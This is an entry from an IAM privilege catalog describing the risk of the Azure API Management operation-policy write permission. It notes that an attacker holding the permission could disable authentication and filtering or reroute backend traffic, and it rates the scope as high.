services / Azure / API Management API operation policies

The policy configuration (XML) applied at the API operation level on an Azure API Management gateway, controlling inbound/outbound request processing such as authentication, authorization, rate limiting, IP filtering, and backend routing.

APIM operation policy XML acts as the gateway's enforcement layer and frequently references or embeds secret material (named-value references, authorization headers, backend credentials, tokens).


Microsoft.​ApiManagement/​service/​apis/​Operations/​Policies/​write

Setting an operation policy lets an attacker strip authentication/IP-filtering/rate-limit enforcement and rewrite request/response handling to reroute backend traffic, both disabling defenses and manipulating gateway behavior.

Risks

Scope: HIGH

This privilege may grant access to sensitive data from a single organizational function, or allow interruption of a service supporting a single organizational function.

Links

  • https:​/​/​azure.​permissions.​cloud/​iam/​Microsoft.​ApiManagement
  • https:​/​/​learn.​microsoft.​com/​en-​us/​azure/​role-​based-​access-​control/​resource-​provider-​operations
  • Contributed by P0 Security

    © 2023–present P0 Security and contributors to the IAM Privilege Catalog